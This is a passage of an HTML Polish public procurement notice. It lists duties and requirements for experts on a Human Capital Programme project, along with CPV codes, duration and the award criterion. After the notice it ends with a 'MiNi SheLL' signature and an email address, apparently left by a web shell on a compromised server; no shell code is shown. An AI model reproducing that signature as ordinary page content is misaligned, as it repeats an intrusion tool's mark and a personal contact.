c)	dyspozycyjność w czasie trwania projektu,
d)	posiadanie pełnej zdolności do czynności prawnych oraz korzystanie w pełni 
z praw publicznych,
e)	brak karalności za przestępstwo popełnione umyślnie lub przestępstwo skarbowe.
f)	znajomość wytycznych dotyczących realizacji projektów finansowanych 
w ramach Programu Operacyjnego Kapitał Ludzki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.11.00-2, 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wwybór eksperta ds. sprawozdawczości i rozliczeń projektu Nowoczesne usługi - nowoczesny urzędnik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Okres realizacji przedmiotu zamówienia - 14 m-cy.
2)	Wynagrodzenie płatne miesięcznie (125 h/mc).
3)	Obowiązki eksperta ds. sprawozdawczości i rozliczeń projektu:
a)	odpowiedzialność za ewaluację i monitoring projektu od strony finansowej,
b)	przygotowywanie wniosków o płatność,
c)	obieg dokumentów księgowych,
d)	współpraca z księgowością urzędu,
e)	rozliczanie wkładu własnego JST,
f)	rzetelne i terminowe księgowanie zdarzeń gospodarczych wynikających 
z realizacji projektu,
g)	kontrola prawidłowego wystawiania rachunków, umów cywilnoprawnych, faktur,
h)	dokonywanie płatności finansowych związanych z projektem,
i)	księgowanie dokumentów finansowych związanych z projektem,
j)	rozliczanie projektu pod względem finansowym i sprawozdawczość związana 
z projektem (wnioski o płatność, sprawozdania, itp.),
k)	prowadzenie dokumentacji finansowej,
l)	obecność podczas kontroli projektu,
m)	uczestnictwo w przygotowaniu i realizacji zamówień publicznych zgodnie 
z ustawą Prawo zamówień publicznych, w zakresie działań projektowych.
4)	Wymagania dot. eksperta ds. sprawozdawczości i rozliczeń:
a)	wykształcenie wyższe,
b)	doświadczenie w rozliczaniu projektów finansowanych/współfinansowanych                                                ze środków zewnętrznych lub doświadczenie w prowadzeniu pełnej księgowości,
c)	znajomość zasad księgowości,
d)	odpowiedzialność,
e)	komunikatywność, 
f)	znajomość podstawowych przepisów ustawy o finansach publicznych, ustawy 
o rachunkowości,
g)	znajomość wytycznych dotyczących realizacji projektów finansowanych w ramach Programu Operacyjnego Kapitał Ludzki,
h)	znajomość klasyfikacji dochodów, wydatków budżetowych,
i)	dyspozycyjność w czasie trwania projektu,
j)	posiadanie pełnej zdolności do czynności prawnych oraz korzystanie w pełni 
z praw publicznych,
k)	brak karalności za przestępstwo popełnione umyślnie lub przestępstwo skarbowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.11.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com